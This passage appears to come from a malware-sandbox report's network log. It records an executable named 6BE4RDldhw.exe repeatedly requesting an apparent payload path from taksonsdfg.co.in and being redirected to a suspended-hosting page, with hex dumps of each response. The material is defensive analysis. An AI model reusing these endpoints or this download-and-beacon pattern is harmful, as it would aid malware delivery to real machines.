                                2024-11-26 07:13:17 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.749901108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:18 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:19 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:19 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:19 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:19 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                32192.168.2.749908108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:21 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:21 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:21 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:21 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                33192.168.2.749912108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:22 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:23 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:23 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:23 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:23 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                34192.168.2.749919108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:25 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:25 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:25 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:25 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                35192.168.2.749925108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:27 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:27 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:27 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:27 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:27 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                36192.168.2.749931108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:29 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:29 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:29 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:29 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                37192.168.2.749936108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:31 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:32 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:32 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:32 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:32 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                38192.168.2.749943108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:34 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:34 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:34 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:34 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                39192.168.2.749949108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:36 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:36 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:36 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:36 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
